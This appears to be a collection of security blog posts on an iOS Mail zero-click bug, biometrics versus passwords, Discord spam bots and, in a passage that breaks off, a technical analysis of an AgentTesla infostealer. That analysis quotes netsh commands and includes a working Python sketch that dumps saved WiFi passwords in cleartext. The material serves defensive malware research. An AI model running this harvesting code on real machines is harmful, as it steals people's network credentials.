IT NEWS

iOS Mail bug allows remote zero-click attacks

On Monday, ZecOps released a report about a pair of concerning vulnerabilities in the Mail app in iOS. These vulnerabilities would allow an attacker to execute arbitrary code in the Mail app, or in maild, the process that assists the Mail app behind the scenes. Most concerning, though, is the fact that even the most current version of iOS, 13.4.1, is vulnerable.

The attack works like this: the threat actor sends an email message designed to cause a buffer overflow in Mail (or maild). A buffer overflow is a bug in code that allows an attacker to fill a block of memory beyond its capacity. Essentially, the attacker writes garbage data that fills up the buffer, then keeps writing so that the excess overwrites code or data in adjoining memory, which later gets executed by the vulnerable process.

The bad news

The vulnerabilities disclosed by ZecOps would allow an attacker to use such a buffer overflow to attack an iOS device remotely, on devices running iOS 6 through iOS 13.4.1. (ZecOps writes that it may work on even older versions of iOS, but they did not test that.)

On iOS 12, the attack requires nothing more than viewing a malicious email message in the Mail app. It would not require tapping a link or any other content within the message. On iOS 13, the situation is worse, as the attack can be carried out against the maild process in the background, without requiring any user interaction (i.e., it is a “zero-click” vulnerability).

In the case of infection on iOS 13, there would be no significant sign of infection, other than temporary slowness of the Mail app. In some cases, evidence of a failed attack may be present in the form of messages that have no content and cannot be displayed.

[Image: messages left behind by failed attack attempts]

The messages—shown in the image above from the ZecOps blog—may be visible for a limited time. Once an attack is successful, the attacker would presumably use access to the Mail app to delete these messages, so the user may never see them.

The good news

I know how this sounds. This is an attack that can be carried out by any threat actor who has your email address, on the latest version of iOS, and the infection happens in the background without requiring action from the user. How is there good news here?!

Fortunately, there is. The vulnerabilities revealed by ZecOps only allow an attack on the Mail app itself. Using those vulnerabilities, an attacker would be able to capture your email messages, as well as modify and delete them. Presumably the attacker would also be able to conduct other normal Mail operations, such as sending messages from your email address, although this was not mentioned. While this isn’t exactly comforting, it falls far short of compromising the entire device.

In order to achieve a full device compromise, the attacker would need another vulnerability. This means that if you are on iOS 13.4.1, the follow-on attack would require a publicly unknown vulnerability—a zero-day—which would for the most part restrict such an attack to a nation-state-level adversary.

In other words, someone would have to be willing to risk burning a zero-day vulnerability, worth potentially a million dollars or more, to infect your phone. This means that you’re unlikely to be infected unless some hostile government or other powerful group is interested in spying on you.

If you are, for example, a human rights advocate working against a repressive regime, or a member of an oppressed minority in such a country, you may be a target. Similarly, if you are a journalist covering such news, you may be a target. You could also be at risk if you are an important business person, such as a CEO or CFO at a major corporation, or hold an important role in the government. The average person will not be at significant risk from this kind of attack.

Why disclose now?

It is common practice as part of “responsible disclosure” to avoid public mention of a major vulnerability until after it has been fixed, or until sufficient time has passed that it is believed the software or hardware vendor does not intend to fix the vulnerability in a timely fashion. Release of this kind of information before a fix is available can lead to increased danger to users, as hackers who learn that a vulnerability exists can find it for themselves.

Of course, this must be balanced against the risk of existing attacks that are going undetected. Disclosure can help people who are under active attack to discover the problem, and can help people who are not yet under attack learn how to prevent an attack.

With this in mind, ZecOps mentioned three reasons why they chose to disclose now:

  1. Since the disclosed vulnerabilities can’t be used to compromise the entire device without additional vulnerabilities, the risk of disclosure is lower.
  2. Apple has released a beta of iOS 13.4.5, which addresses the issue. Although a fix in beta is not exactly the same as a fix in a public release, the changes in the beta could be analyzed by an attacker, which would lead to discovery of the vulnerabilities. Essentially, the vulnerabilities have been disclosed to malicious hackers already, but the public was unaware.
  3. At least six organizations were under active attack using these vulnerabilities. (The organizations were not named.)

What you should do

First, don’t panic. As mentioned, this is not a widespread attack against everyone using an iPhone. There have been other zero-click vulnerabilities used to push malware onto iPhones in the past, yet none have ever been widespread. This is because the more widespread such an attack becomes, the more likely it is to be spotted, and subsequently fixed by Apple.

To protect their investment in million-dollar iOS zero-day vulnerabilities, powerful organizations use those vulnerabilities sparingly, only against targeted individuals or groups. Thus, unless you’re someone who might be targeted by a hostile nation or other powerful organization, you’re not likely to be in danger.

However, the risk does increase following disclosure, as malicious hackers can discover and use the vulnerability to attack Mail, at least. So you shouldn’t ignore the risk, either.

As much as I’d like to say, “Install Malwarebytes, run a scan, and remove the malware,” I can’t. Unlike on macOS, installing antivirus software isn’t possible on iOS, due to Apple restrictions. So there is no software that can scan an iPhone or iPad for malware.

This, plus the lack of noticeable symptoms, means that it will be difficult to determine whether you’ve been affected. As always with iOS, if you have reason to believe you’ve been infected, your only option is to reset your device to factory state and set it up again from scratch as if it were a new device.

As for precautions to avoid infection, there are a couple of things you can do. One would be to install the iOS 13.4.5 beta, which contains a fix for the bug. This isn’t easy to do, however, as you need an Apple developer account to download the beta. Plus, using a beta version of iOS, which may have bugs of its own, isn’t recommended for all users.

The other possible security measure would be to disable Mail until the next version of iOS is released publicly. To do so, open the Settings app and scroll down to Passwords & Accounts. Tap that, then look at the list of accounts.

[Image: the Passwords & Accounts screen in iOS Settings]

You may have multiple accounts, as shown above, or only one. Any account that says “Mail” underneath it is one for which you’re using Mail to download messages. Tap each account, and on the next screen, look for the Mail toggle.

[Image: an account’s settings showing the Mail toggle enabled]

The image above shows that Mail is enabled. Toggle the switch to off. Do this for each of your accounts, and do not switch Mail back on again until you’ve updated to a version of iOS newer than 13.4.1.

Stay safe, everyone!

The post iOS Mail bug allows remote zero-click attacks appeared first on Malwarebytes Labs.

The passwordless present: Will biometrics replace passwords forever?

When it comes to securing your sensitive, personally identifiable information against criminals who can engineer countless ways to snatch it from under your nose, experts have long recommended the use of strong, complex passwords. Using long passphrases with combinations of numbers, letters, and symbols that cannot be easily guessed has been the de facto security guidance for more than 20 years. But does it stand up to scrutiny?

Users typically prefer short, easy-to-remember passwords for convenience, especially since the average person has more than 27 different online accounts that require credentials. However, such passwords have low entropy, making them easy for hackers to guess or brute force.
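As a rough way to put numbers on “entropy”: a randomly chosen password carries length × log2(alphabet size) bits of it, and every extra bit doubles the work of a brute-force attack. A quick back-of-the-envelope sketch in Python (the figures here are illustrative, and human-chosen passwords score far lower than this idealized math suggests):

    import math

    def entropy_bits(length: int, alphabet_size: int) -> float:
        # A random password drawn from `alphabet_size` symbols carries
        # length * log2(alphabet_size) bits of entropy.
        return length * math.log2(alphabet_size)

    print(entropy_bits(8, 26))   # 8 lowercase letters: ~37.6 bits (weak)
    print(entropy_bits(12, 94))  # 12 printable ASCII characters: ~78.7 bits
    print(entropy_bits(20, 94))  # 20-character passphrase: ~131 bits (strong)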

If we factor in the consistent use of a single low-entropy password across all online accounts, despite repeated warnings, then we have a crisis on our hands—especially because remembering 27 unique, complex passwords, PIN codes, and answers to security questions is likely overwhelming for most users.

Instead of faulty and forgettable passwords, tech developers are now pushing to replace them with something that all human beings have: ourselves.

Bits of ourselves, to be exact. Dear reader, let’s talk biometrics.

Biometrics then and now

Biometrics—or the use of our unique physiological traits to identify and/or verify our identities—has been around far longer than our computing devices. Handprints found in caves thousands of years old are considered one of the earliest forms of physiological biometrics. Portuguese historian and explorer João de Barros recorded in his writings that 14th-century Chinese merchants used their fingerprints to finalize transaction deals, and that Chinese parents used fingerprints and footprints to differentiate their children from one another.

Hands down, human beings are the best biometric readers—it’s innate in all of us. Studying someone’s facial features, height, weight, or notable body markings, for example, is one of the most basic and earliest means of identifying unfamiliar individuals without knowing or asking for their name. Recognizing familiar faces among a sea of strangers is a form of biometrics, as is meeting new people or determining which person out of a lineup committed a certain crime.

As the population boomed, the process of telling one human being from another became much more challenging. Listing facial features and body markings was no longer enough to accurately track individual identities at the macro level. Therefore, we developed sciences (anthropometry, from which biometrics stems), systems (the Henry Classification System), and technologies to aid us in this nascent pursuit. Biometrics didn’t really become “a thing” until the 1960s—the same era in which computer systems emerged.

Today, many biometric modalities are in place for identification, classification, education, and, yes, data protection. These include fingerprints, voice recognition, iris scanning, and facial recognition. Many of us are familiar with these modalities and use them to access our data and devices every day. 

Are they the answer to the password problem? Let’s look at some of these biometrics modalities, where they are normally used, how widely adopted and accepted they are, and some of the security and privacy concerns surrounding them.

Fingerprint scanning/recognition

Fingerprint scanning is perhaps the most common, widely used, and accepted form of biometric modality. Historically, fingerprints—and in some cases, full handprints—were used as a means to denote ownership (as we’ve seen in cave paintings) and to prevent impersonation and the repudiation of contracts (as Sir William Herschel did when he was part of the Indian Civil Service in the 1850s).

Fingerprint and handprint samples taken by William Herschel as part of “The Beginnings of Finger-printing”

Initially, only those in law enforcement could collect and use fingerprints to identify or verify individuals. Today, billions of people around the world carry a fingerprint scanner as part of their smartphones or smart payment cards.

While fingerprint scanning is convenient, easy to use, and fairly accurate (with the exception of the elderly, whose skin elasticity decreases with age), it can be circumvented—and white hat hackers have proven this time and time again.

When Apple first introduced TouchID, its then-flagship feature on the 2013 iPhone 5S, the Chaos Computer Club (CCC) from Germany bypassed it a day after its reveal. A similar incident happened in 2019, when Samsung debuted the Galaxy S10. Security researchers from Tencent even demonstrated that any fingerprint-locked smartphone can be hacked, whether it uses capacitive, optical, or ultrasonic sensor technology.

“We hope that this finally puts to rest the illusions people have about fingerprint biometrics,” said Frank Rieger, spokesperson for the CCC, after the group defeated TouchID. “It is plain stupid to use something that you can’t change and that you leave everywhere every day as a security token.”

Voice recognition

Otherwise known as speaker recognition or speech recognition, voice recognition is a biometric modality that, at base level, recognizes sound. In recognizing sound, however, this modality must also measure complex physiological components—the physical size, shape, and health of a person’s vocal cords, lips, teeth, tongue, and mouth cavity. In addition, voice recognition tracks behavioral components—the accent, pitch, tone, talking pace, and emotional state of the speaker, to name a few.

There are two variants of voice recognition: speaker dependent and speaker independent.

Voice recognition is used today in computer operating systems, as well as in mobile and IoT devices, for command and search functionality: Siri, Alexa, and other digital assistants fit this profile. There are also software programs and apps designed around voice recognition, such as translation and transcription services, reading assistance, and educational programs.

Two variants of voice recognition are in use today: speaker dependent and speaker independent. Speaker dependent voice recognition requires training on a user’s voice: it needs to become accustomed to the user’s accent and tone before it can recognize what was said. This is the type used to identify and verify user identities. Banks, tax offices, and other services have bought into the notion of using voice for customers to access their sensitive financial data. The caveat here is that only one person can use such a system at a time.

Speaker independent voice recognition, on the other hand, doesn’t need training and recognizes input from multiple users. Instead, it is programmed to recognize and act on certain words and phrases. Examples of speaker independent voice recognition technology are the aforementioned virtual assistants, such as Windows’ Cortana, and automated telephone interfaces.
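To get a sense of how accessible speaker independent recognition has become, here’s a minimal sketch using the open-source SpeechRecognition package for Python. It simply transcribes whatever is said, with no per-user training; microphone support additionally assumes the PyAudio package is installed:

    import speech_recognition as sr  # pip install SpeechRecognition

    recognizer = sr.Recognizer()

    # Speaker independent: no training, just transcribe whoever is talking.
    with sr.Microphone() as source:
        recognizer.adjust_for_ambient_noise(source)  # background noise hurts accuracy
        audio = recognizer.listen(source)

    try:
        print(recognizer.recognize_google(audio))  # sends the audio to a hosted API
    except sr.UnknownValueError:
        print("Could not understand the audio")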

But voice recognition has its downsides, too. While it has improved in accuracy by leaps and bounds over the last 10 years, there are still issues to solve, especially for women and people of color. Like fingerprint scanning, voice recognition is also susceptible to spoofing. In addition, it’s easy to taint the quality of a voice recording with a poor microphone or background noise that may be difficult to avoid.

To prove that using voice to authenticate account access is insufficient on its own, researchers from Salesforce broke voice authentication at Black Hat 2018 using machine learning and voice synthesis, a technology that can create lifelike human voices. They also found that the synthesized voice’s quality only needed to be good enough to do the trick.

“In our case, we only focused on using text-to-speech to bypass voice authentication. So, we really do not care about the quality of our audio,” said John Seymour, one of the researchers. “It could sound like garbage to a human as long as it bypasses the speech APIs.”

All this, and we haven’t even talked about voice deepfakes yet. Imagine fraudsters having the ability to pose as anyone they want using artificial intelligence and a five-second recording of a victim’s voice. As applicable as voice recognition is as a technology, it’s perhaps the weakest form of biometric identity verification.

Iris scanning or iris recognition

Advocates of iris scanning claim that it is quicker and more reliable than fingerprint scanning as a means of identification, as irises are less likely to be altered or obscured than fingerprints.

Sample iris pattern image. The bit stream (top left) was extracted based on this particular eye’s lines and colors, and is then used for comparison with other patterns in a database.

Iris scanning is usually conducted with invisible infrared light that passes over the iris; the iris’s unique patterns and colors are read, analyzed, and digitized for comparison against a database of stored iris templates, either for identification or verification.
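Under the hood, matching is typically a bitwise comparison: two iris codes are XORed, and the fraction of differing bits (the Hamming distance) decides whether they plausibly came from the same eye. A simplified sketch of that comparison step—the threshold value here is illustrative, not taken from any particular product:

    def hamming_distance(code_a: bytes, code_b: bytes) -> float:
        # Fraction of bits that differ between two equal-length iris codes.
        assert len(code_a) == len(code_b)
        differing = sum(bin(a ^ b).count("1") for a, b in zip(code_a, code_b))
        return differing / (len(code_a) * 8)

    def same_eye(code_a: bytes, code_b: bytes, threshold: float = 0.30) -> bool:
        # Two scans of the same iris are never bit-identical; they just need
        # to land under a distance threshold.
        return hamming_distance(code_a, code_b) < threshold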

Unlike fingerprint scanning, which requires a finger to be pressed against a reader, iris scanning can be done both within close range and from afar, as well as standing still and on-the-move. These capabilities raise significant privacy concerns, as individuals and groups of people can be surreptitiously scanned and captured without their knowledge or consent.

There’s an element of security concern with iris scanning as well: Third parties normally store these templates, and we have no idea how iris templates—or any biometric templates, for that matter—are stored, secured, and shared. Furthermore, scanning the irises of children under 4 years old generally produces scans of inferior quality compared to those of adults.

Iris scanners, especially those marketed as airtight or unhackable, haven’t escaped cybercriminals’ radar. In fact, such claims often fuel their motivation to prove the technology wrong. In 2019, eyeDisk, the purported “unhackable USB flash drive,” was hacked by white hat hackers at Pen Test Partners. And after making a splash breaking Apple’s TouchID in 2013, the CCC hacked Samsung’s “ultra secure” iris scanner for the Galaxy S8 four years later.

“The security risk to the user from iris recognition is even bigger than with fingerprints as we expose our irises a lot,” said Dirk Engling, a CCC spokesperson. “Under some circumstances, a high-resolution picture from the Internet is sufficient to capture an iris.”

Facial recognition

This biometric modality has been all the rage over the last five years. Facial recognition systems analyze images or video of the human face by mapping its features and comparing them against a database of known faces. Facial recognition can be used to grant access to accounts and devices that are typically locked by other means, such as a PIN, password, or other form of biometric. It can be used to tag photos on social media or optimize image search results. And it’s often used in surveillance, whether to prevent retail crime or help police officers identify criminals.
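As a concrete illustration of that map-and-compare pipeline, the open-source face_recognition library for Python reduces it to a few lines. This is a sketch of the general technique, not any specific vendor’s system, and the file names are placeholders:

    import face_recognition  # pip install face_recognition

    # Map each face to a numeric feature vector (an "encoding").
    known_image = face_recognition.load_image_file("badge_photo.jpg")
    known_encoding = face_recognition.face_encodings(known_image)[0]  # assumes a face is found

    probe_image = face_recognition.load_image_file("camera_frame.jpg")

    # Compare: a match means the encodings fall within a distance tolerance.
    for encoding in face_recognition.face_encodings(probe_image):
        match = face_recognition.compare_faces([known_encoding], encoding)[0]
        print("Same person" if match else "Unknown face")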

As with iris scanners, a concern of security and privacy advocates is that facial recognition technology can be used in combination with public (or hidden) cameras that don’t require knowledge or consent from those being scanned. Combine this with a lack of federal regulation, and you once again have an example of technology that has raced far ahead of our ability to define its ethical use. Accuracy is another point of contention, and multiple studies have documented the technology’s imprecision, especially when identifying people of color.

Private corporations, such as Apple, Google, and Facebook, have developed facial recognition technology for identification and authentication purposes, while governments and law enforcement implement it in surveillance programs. However, citizens—the targets of this technology—have both tentatively embraced facial recognition as a password replacement and rallied against its Big Brother application via government monitoring.

When talking about the use of facial recognition technology for government surveillance, China is perhaps the top country that comes to mind. To date, China has at least 170 million CCTV cameras—and this number is expected to increase almost threefold by 2021.

With this biometric modality being used at universities, shopping malls, and even public toilets (to prevent people from taking too many tissues), surveys show Chinese citizens are wary of the data being collected. Meanwhile, the facial recognition industry in China has been the target of US sanctions for violations of human rights.

China is one of the top five countries named in the “State Enemies of the Internet” list, which was published by Reporters Without Borders in 2013.

“AI and facial recognition technology are only growing and they can be powerful and helpful tools when used correctly, but can also cause harm with privacy and security issues,” wrote Nicole Martin in Forbes. “Lawmakers will have to balance this and determine when and how facial technology will be utilized and monitor the use, or in some cases abuse, of the technology.”

Behavioral biometrics

Otherwise known as behaviometrics, this modality involves the reading of measurable behavioral patterns for the purpose of recognizing or verifying a person’s identity. Unlike the other biometrics mentioned in this article, which are measured in a quick, one-time scan (static biometrics), behavioral biometrics is built around continuous monitoring and verification of traits and micro-habits.

Gait recognition, or gait analysis, is a popular example of behavioral biometrics.

This could mean, for example, that from the time you open your banking app to the time you finish using it, your identity has been checked and re-checked multiple times, assuring your bank that you are who you claim to be the entire time. The bonus? The process is frictionless, so users don’t realize the analysis is happening in the background.
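Keystroke dynamics, one signal commonly grouped under this umbrella, gives a feel for what continuous verification can measure. The toy sketch below compares a live typing rhythm against an enrolled profile; the single feature (average inter-key interval) and the threshold are deliberately simplistic assumptions, as real systems model far richer features:

    from statistics import mean

    # Seconds between consecutive keystrokes while typing a known phrase,
    # captured when the user enrolled.
    enrolled_profile = [0.21, 0.18, 0.25, 0.19, 0.22]

    def matches_profile(sample: list[float], profile: list[float],
                        threshold: float = 0.05) -> bool:
        # Compare average inter-key interval; production systems also use
        # dwell time, flight time, and statistical models per key pair.
        return abs(mean(sample) - mean(profile)) < threshold

    live_sample = [0.23, 0.20, 0.24, 0.18, 0.21]
    print(matches_profile(live_sample, enrolled_profile))  # True: rhythm matches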

Private institutions have taken notice of behavioral biometrics—and the technology and systems behind this modality—because it offers a multitude of benefits. It can be tailored according to an organization’s needs. It’s efficient and can produce results in real time. And it’s secure, since biometric data of this kind is difficult to steal or replicate. The data retrieved from users is also highly accurate.

Like any other biometric modality, behavioral biometrics brings up privacy concerns. However, the data collected by a behavioral biometric application is typically data already being collected by device or network operators, and is recognized by standard privacy laws. Another plus for privacy advocates: Behavioral data is not defined as personally identifiable, although regulation is being considered so that users are not targeted by advertisers.

While voice recognition (which we mentioned above), keystroke dynamics, and signature analysis all fall under the umbrella of behavioral biometrics, take note that organizations employing a behavioral biometric scheme do not necessarily use these particular modalities.

Biometrics vs. passwords

At face value, any of the biometric modalities available today might appear to be superior to passwords. After all, one could argue that it’s easy for numeric and alphanumeric passwords to be stolen or hacked. Just look at the number of corporate breaches and millions of affected users bombarded by scams, phishing campaigns, and identity theft. Meanwhile, theft of biometric data has not yet happened at this scale (to our knowledge).

While this argument may have some merit, remember that when a password is compromised, it can be easily replaced with another password, ideally one with higher entropy. However, if biometric data is stolen, it’s impossible for a person to change it. This is, perhaps, the top argument against using biometrics.

Because a number of our physiological traits can be publicly observed, recorded, scanned from afar, or readily taken as we leave them everywhere (fingerprints), it is argued that consumer-grade biometrics—without another form of authentication—are no more secure than passwords.

Not only that, but the likelihood of cybercriminals using such data to steal someone’s identity or commit fraud will increase significantly over time. Biometric data may not (yet) open new banking accounts under your name, but it can be abused to gain access to devices and establishments that have a record of your biometric. Thanks to new “couch-to-plane” schemes several airports are beginning to adopt, stolen biometrics could put a fraudster on a plane to any destination they wish.

What about DNA as passwords?

Using one’s DNA as a password is a concept that is far from far-fetched, although not widely known or used in practice. In a recent paper, authors Madhusudhan R and Shashidhara R proposed a DNA-based authentication scheme for mobile environments using a Hyper Elliptic Curve Cryptosystem (HECC), allowing for greater security when exchanging information over a radio link. This is not only practical but can also be implemented on resource-constrained mobile devices, the authors say.

This may sound good on paper, but as the idea is still purely theoretical, privacy-conscious users will likely need a lot more convincing before using their own DNA for verification purposes. While DNA may seem like a cool and complicated way to secure our sensitive information, much like our fingerprints, we leave DNA behind all the time. And, just as we can’t change our fingerprints, our DNA is permanent. Once stolen, we can never use it for verification again.

Furthermore, the once promising idea of handing over your DNA to be stored in a giant database in exchange for learning your family’s long-forgotten secrets seems to have lost its charm. This is due to increased awareness among users of the privacy concerns surrounding commercial DNA testing, including how the companies behind them have been known to hand over data to pharmaceutical companies, marketers, and law enforcement. Not to mention, studies have shown that such test results are inaccurate about 40 percent of the time.

With so many concerns, perhaps it’s best to leave the notion of using DNA as your proverbial keys to the kingdom behind, and instead focus on improving how you create, use, and store passwords.

Passwords (for now) are here to stay

As we have seen, biometrics isn’t the be-all and end-all most of us expected. However, this doesn’t mean biometrics can’t be used to secure what you hold dear. When we do use them, they should be part of a multi-factor authentication scheme—not a password replacement.

What does that look like in practice? For top-level security that solves the issue of having to remember so many complex passwords, store your account credentials in a password manager. Create a complex, long passphrase as the master password. Then, use multi-factor authentication to verify the master password. This might involve sending a passcode to a second device or email address to be entered into the password manager. Or, if you’re an organization willing to invest in biometrics, use a modality such as voice recognition to speak an authentication phrase.
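To make the multi-factor step concrete, here’s a minimal sketch of a time-based one-time password (TOTP) check—the mechanism behind the rotating six-digit codes in authenticator apps—using the pyotp library. The enrollment flow is simplified for illustration:

    import pyotp  # pip install pyotp

    # Generated once at enrollment and shared with the user's authenticator
    # app, typically via a QR code.
    secret = pyotp.random_base32()
    totp = pyotp.TOTP(secret)

    print("Current code:", totp.now())  # rotates every 30 seconds

    # At login: check the master password first, then the rotating code.
    user_code = input("Enter the code from your authenticator app: ")
    print("Access granted" if totp.verify(user_code) else "Access denied")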

So, are biometrics here to stay? Definitely. But so are passwords.

The post The passwordless present: Will biometrics replace passwords forever? appeared first on Malwarebytes Labs.

A week in security (April 13 – 19)

Last week on Malwarebytes Labs, we looked at how to avoid Zoom bombing, weighed the risks of surveillance versus pandemics, and dug into a spot of WiFi credential theft.

Other cybersecurity news:

  • Malware creeps back into the home: With a pandemic forcing much of the workforce into remote positions, it’s worth noting that a study found malware on 45 percent of home office networks. (Source: TechTarget)
  • Free shopping scam: Coronavirus fraudsters attempt to cash in on people’s fears with fake free offers at Tesco. (Source: Lincolnshire Live)
  • Browser danger: Researchers tackle a fake browser extension campaign that targets users of Ledger and other plugins. (Source: MyCrypto/PhishFort)
  • Phishing for cash: Research shows how phish kit selling is a profitable business. (Source: Help Net Security)
  • Big problem, big bucks: The FTC thinks Americans have lost out to the tune of 13 million dollars thanks to coronavirus scams. (Source: The Register)
  • Facebook tackles bots: A walled off simulation has been created to dig deep into the world of scams and trolls. (Source: The Verge)
  • Apple of my eye: Apple remains the top brand for phishing scammers to target. (Source: CISO Mag)
  • Fake Valorant beta keys: Reports have surfaced of fake tools promising access to upcoming game Valorant’s beta, with horribly predictable results. (Source: CyberScoop)

Stay safe, everyone!

The post A week in security (April 13 – 19) appeared first on Malwarebytes Labs.

Discord users tempted by bots offering “free Nitro games”

The last few weeks have seen multiple instances of problematic bots appearing in Discord channels. They bring tidings of gifts, but the reality is quite a bit different. Given that so many more young kids and teens are at home during the current global lockdown, they may well see this scam bouncing around their chat channels. Worried parents may want to point them in this direction to learn about the warning signs.

What is Discord?

Sorry, teens who’ve been pointed in this direction: You can skip this part. For anyone else who needs it, Discord is a mostly gaming-themed communication platform incorporating text, voice, and video. It’s not to be mixed up with Twitch, which is more geared toward live gaming streams, e-sports competitions, and older recordings of big events.

DIY bots: part of the ecosystem

One of the most interesting features of Discord is that anyone can make their own channel bot. Simply bolt one together, keep the authorization token safe, and invite it into your channel. If you run into a bot you like the look of in someone else’s channel, you can usually invite it back to your own (or somewhere else), but you’ll need “manage server” permissions on your account.

You have to do a little due diligence, as things can go wrong if you don’t keep your bot and account locked down. Additionally, the very openness available to build your own bot means people can pretty much make what they like. It’s up to you as a responsible Discord user to keep that in mind before inviting all and sundry into the channel. Not all bots have the best of intentions, as we’re about to find out.

Discord in bot land

[Image: direct message from a bot calling itself “Twitch”]

If you’re minding your business in Discord, you could be sent a direct message similar to the one above. It looks official, calls itself “Twitch,” and goes on to say the following:

Exclusive partnership

We are super happy to announce that Discord has partnered with Twitch to show some love to our super great users! From April 05, 2020 until April 15, 2020 all our users will have access to Nitro Games

You have to invite me to your servers

If there’s one thing people can appreciate in the middle of a global pandemic, it’s freebies. Clicking the blue text will pop open an invite notification:

[Image: the bot invite notification]

Add bot to: [server selection goes here]

This requires you to have manage server permissions in this server.

It then goes on to give some stats about whatever bot you’re trying to invite. The one above has been active since April 13, 2019, and is used across 1,000 servers, so it’s got a fair bit of visibility. As per the above notification, “This application cannot read your messages or send messages as you.”

Sounds good, right? Except there are some holes in the free Nitro games story.

Nitro is a real premium service from Discord, offering a variety of tools and functions for users. The problem is that the games offered with Nitro were shut down last October due to lack of use. What, exactly, is being invited into servers, then?

Spam as a service

Multiple Discord users have reported these bots in the last few days, mostly in relation to spam, nude pic channels, and the occasional potentially dubious download sitting on free file hosting websites. A few folks have mentioned phishing, though we’ve seen no direct links to actual phishes taking place at the time of writing.

Another Discord user mentioned that, if given access, the bot will (amongst other things) ban everyone from the server and delete all channels. But considering the aim of the game here is to spam links and draw additional people in, that would seem counterproductive to the main goal of increasing traffic to specific servers.

Examples: Gaming spam

Here’s one server offered up as a link from one of the bots as reported by a user on Twitter:

[Image: a Discord server claiming to give away Valorant accounts]

This claims to be an accounts center for the soon-to-be-smash-hit game Valorant, currently in closed beta. The server owner explains they’d rather give accounts away than sell them in order to grow their channel, which is consistent with the bots we’ve seen spreading links rather than destroying channels. While they object to “botted invites,” claiming they’ll ban anyone shown to be inviting via bots, they’re also happy to suggest spamming links to grow their channel numbers.


It’s probably a good idea they’re not selling accounts, because Riot takes a dim view of selling; having said that, promoting giveaway Discords doesn’t seem too popular either.

Examples: Discord goes XXX

Before we can stop and ponder our Valorant account invite frenzy, a new private message has arrived from a second bot. It looks the same as the last bogus Nitro invite, but with a specific addition:


You’ve been invited to join a server: JOIN = FREE DISCORD NITRO AND NUDES

Nudes? Well, that’s a twist.


This is a particularly busy location, with no fewer than 15,522 members and roughly 3,000 people online. The setup is quite locked down: There’s no content available unless you work for it, by virtue of sending invites to as many people as possible.


The Read Me essentially says little beyond “Invite people to get nudes.”


Elsewhere it promotes a “nudes” Twitter profile, with the promise of videos for retweets. The account, in keeping with the general sense of lockdown, has no nudity on it.


As you can guess, these bots are persistent. Simply lingering in a server can result in a procession of invites to your account.


We were sent to a variety of locations during testing, including some that could have been about films and television, pornography, or both—but in most cases it was hard to say, as almost every place we landed locked its content down.

This makes sense for the people running these channels: If everything was open from the get-go, visitors would have no incentive to go spamming links in the dash to get some freebies.

Bots on parade

We didn’t see a single place linked from any of these bots that mentioned free Discord Nitro—it’s abandoned entirely upon entry. Visitors probably have no reason to question otherwise, and so will go off to do their free promotional duties. Again, while it’s entirely possible bots out there are wiping out people’s communities, during testing all we saw in relation to the supposed Nitro spam bots was a method for channel promotion.

If you have server permissions, you should think carefully about which bots you allow into your server. There are no free games, but there is a whole lot of spam on the horizon if you’re not paying attention.

The post Discord users tempted by bots offering “free Nitro games” appeared first on Malwarebytes Labs.

New AgentTesla variant steals WiFi credentials

AgentTesla is a .NET-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. The actor behind this malware constantly maintains it by adding new modules. One of the newest additions is the capability to steal WiFi profiles.

AgentTesla was first seen in 2014, and has been used frequently by cybercriminals in various malicious campaigns since. During March and April 2020, it was actively distributed through spam campaigns in different formats, such as ZIP, CAB, MSI, and IMG files, and Office documents.

Newer variants of AgentTesla seen in the wild have the capability to collect information about a victim’s WiFi profile, possibly to use it as a way to spread onto other machines. In this blog, we review how this new feature works.

Technical analysis

The variant we analyzed was written in .NET. It has an executable embedded as an image resource, which is extracted and executed at run-time (Figure 1).

Figure 1. Extract and execute the payload.

This executable (ReZer0V2) also has a resource that is encrypted. After doing several anti-debugging, anti-sandboxing, and anti-virtualization checks, the executable decrypts and injects the content of the resource into itself (Figure 2).

Figure 2. Decrypt and execute the payload.

The second payload (owEKjMRYkIfjPazjphIDdRoPePVNoulgd) is the main component of AgentTesla that steals credentials from browsers, FTP clients, wireless profiles, and more (Figure 3). The sample is heavily obfuscated to make the analysis more difficult for researchers.

Figure 3. The second payload.

To collect wireless profile credentials, a new “netsh” process is created, passing “wlan show profile” as an argument (Figure 4). Available WiFi names are then extracted by applying the regex “All User Profile * :  (?<profile>.*)” to the stdout output of the process.

Figure 4. Creating the netsh process.

In the next step, for each wireless profile, the following command is executed to extract the profile’s credentials: “netsh wlan show profile PROFILENAME key=clear” (Figure 5).

Figure 5. Extracting WiFi credentials.
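For defenders who want to reproduce this behavior in a lab, the same two-step harvest can be sketched in a few lines of Python (the malware does the equivalent from .NET by spawning netsh and parsing its output; this is Windows-only, since netsh ships with the OS):

    import re
    import subprocess

    # Step 1: list saved WiFi profiles, as the malware does via netsh.
    out = subprocess.run(["netsh", "wlan", "show", "profile"],
                         capture_output=True, text=True).stdout

    # Same idea as the malware's regex: grab names after "All User Profile".
    profiles = [p.strip() for p in re.findall(r"All User Profile\s*:\s*(.*)", out)]

    # Step 2: for each profile, ask for the key in cleartext.
    for name in profiles:
        detail = subprocess.run(
            ["netsh", "wlan", "show", "profile", f"name={name}", "key=clear"],
            capture_output=True, text=True).stdout
        key = re.search(r"Key Content\s*:\s*(.*)", detail)
        if key:
            print(f"{name}: {key.group(1).strip()}")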

String encryption

All the strings used by the malware are encrypted, and are decrypted with the Rijndael symmetric encryption algorithm in the “<Module>.u200E” function. This function receives a number as input and generates three byte arrays containing the input to be decrypted, the key, and the IV (Figure 6).

Figure 6. u200E function snippet.

For example, in Figure 5, “119216” is decrypted into “wlan show profile name=” and “119196” is decrypted into “key=clear”.
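Since Rijndael with a 128-bit block is simply AES, the string table can be decoded offline once the three arrays for a given ID are recovered. A sketch of that decryption step, assuming CBC mode with PKCS7 padding (the defaults for .NET’s RijndaelManaged; the sample’s exact parameters are an assumption here):

    from Crypto.Cipher import AES  # pip install pycryptodome

    def decrypt_string(ciphertext: bytes, key: bytes, iv: bytes) -> str:
        # The malware's <Module>.u200E function maps a numeric ID (e.g. 119216)
        # to these three byte arrays.
        plaintext = AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext)
        return plaintext[:-plaintext[-1]].decode("utf-8")  # strip PKCS7 padding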

In addition to WiFi profiles, the executable collects extensive information about the system, including FTP clients, browsers, file downloaders, and machine info (username, computer name, OS name, CPU architecture, RAM), and adds it all to a list (Figure 7).

Figure 7. List of collected info.

The collected information forms the body of an SMTP message in HTML format (Figure 8):

Figure 8. Collected data in HTML format in the message body.

Note: If the final list has fewer than three elements, the malware won’t generate an SMTP message. If everything checks out, a message is finally sent via smtp.yandex.com, with SSL enabled (Figure 9):

